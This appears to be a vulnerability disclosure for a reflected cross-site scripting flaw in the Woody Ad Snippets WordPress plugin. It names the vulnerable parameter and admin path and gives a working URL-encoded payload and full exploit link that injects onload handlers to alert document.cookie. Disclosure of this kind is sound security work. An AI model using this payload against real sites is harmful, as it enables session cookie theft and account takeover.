Business Details:

Vendor: Webcraftic
Plugin:  Woody Ad Snippets
CMS:  WordPress
Active Installations: +90k

Downloads: +677k

Technical Details:

Bug Type: Reflected XSS
Severity: Medium 

Affected Parameter: winp_item
Affected Path: https://[WEBSITE]/wp-admin/post-new.php


Used Payload:

phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqg

Full Link:

http://[WEBSITE]/wp-admin/post-new.php?post_type=wbcr-snippets&winp_item=phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqggm

Proof of Concept:
Youtube Video

Leave a Reply

Your email address will not be published. Required fields are marked *